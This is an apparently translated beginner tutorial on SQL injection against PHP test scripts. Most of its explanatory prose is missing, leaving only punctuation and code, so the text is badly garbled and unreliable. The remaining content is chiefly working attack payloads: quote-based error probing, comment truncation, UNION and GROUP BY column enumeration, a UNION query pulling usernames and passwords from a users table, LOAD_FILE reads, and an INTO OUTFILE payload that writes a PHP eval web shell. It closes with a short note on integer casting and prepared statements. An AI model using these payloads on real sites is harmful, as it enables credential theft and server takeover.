SQL injection for beginners. Part 1
Greetings, dear reader. Lately, I have been keen on Web security, and to some extent work is related to this. Because I began to notice more and more topics in various forums, with a request to show how it all works, I decided to write an article. The article will be designed for those who have not encountered similar, but would like to learn. There are relatively many articles on this topic online, but for beginners they are a bit complicated. I will try to describe everything in clear language and detailed examples.
Foreword
In order to understand this article, you do not really need knowledge of the SQL language, but at least having good patience and a little brain to memorize.
I believe that one reading of the article will not be enough, because we need living examples - as is well known, practice, in the process of memorizing, is not superfluous. Therefore, we will write vulnerable scripts and train on them.
')
What is SQL injection?
— , , . :
, , 100 . SQL , :
100
- ( ), , — . , , « » :
100
, , 100 . SQL :) ( ), .
, . . cfg.php
SQL injection
, , . — ID. . GET/POST Cookie!
index1.php. , ID .
sqlinj/index1.php?id=1'
.. :
$id = $_GET['id'];
$query = "SELECT * FROM news WHERE id=$id";
SELECT * FROM news WHERE id=1'
:
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\WebServ\domains\sqlinj\index1.php on line 16
— :
1.SQL — , (int)
2. .
— ! SQL — .
index2.php. , :
$user = $_GET['user'];
$query = "SELECT * FROM news WHERE user='$user'";
, — .
:
sqlinj/index2.php?user=AlexanderPHP'
. ! . — .
- , . , "
-- " SQL.! . URL %20
, — :
SELECT * FROM news WHERE user='AlexanderPHP' -- habrahabra. index2.php, :
sqlinj/index2.php?user=AlexanderPHP'%20--%20habrahabrUNION. SQL UNION SQL- . , - .
«», . index1.php.
sqlinj/index1.php?id=1 UNION SELECT 1. :SELECT * FROM news WHERE id=1 UNION SELECT 1, .. , .
.. , , .
, :
sqlinj/index1.php?id=1 UNION SELECT 1,2…
sqlinj/index1.php?id=1 UNION SELECT 1,2,3!
sqlinj/index1.php?id=1 UNION SELECT 1,2,3,4,5! 5.
GROUP BY
, 20 40 60. , GROUP BY
sqlinj/index1.php?id=1 GROUP BY 2, - 2. :
sqlinj/index1.php?id=1 GROUP BY 8, , - 8.
GROUP BY 4 , GROUP BY 6 — , - 5
, , ID, :
sqlinj/index1.php?id=-1 UNION SELECT 1,2,3,4,5
, , . , , .
, users id, name pass.
ID=1
:
sqlinj/index1.php?id=-1 UNION SELECT 1,2,3,4,5 FROM users WHERE id=1, , 1 3
sqlinj/index1.php?id=-1 UNION SELECT name,2,pass,4,5 FROM users WHERE id=1— !
« », index2.php . :
sqlinj/index2.php?user=-1' UNION SELECT name,2,pass,4,5 FROM users WHERE id=1 --%20/
, FILE_PRIV.
. , OUTFILE .
sqlinj/index2.php?user=-1' UNION SELECT 1,2,3,4,5 INTO OUTFILE '1.php' --%20, . , -:
sqlinj/index2.php?user=-1' UNION SELECT 1,'<?php eval($_GET[1]) ?>',3,4,5 INTO OUTFILE '1.php' --%20, . LOAD_FILE, , :
sqlinj/index2.php?user=-1' UNION SELECT 1,LOAD_FILE('1.php'),3,4,5 --%20, .
, . . ,
$id = (int) $_GET['id'];
malroc. PDO prepared statements.
«SQL injection ». . .
, .
Source: https://habr.com/ru/post/148151/
All Articles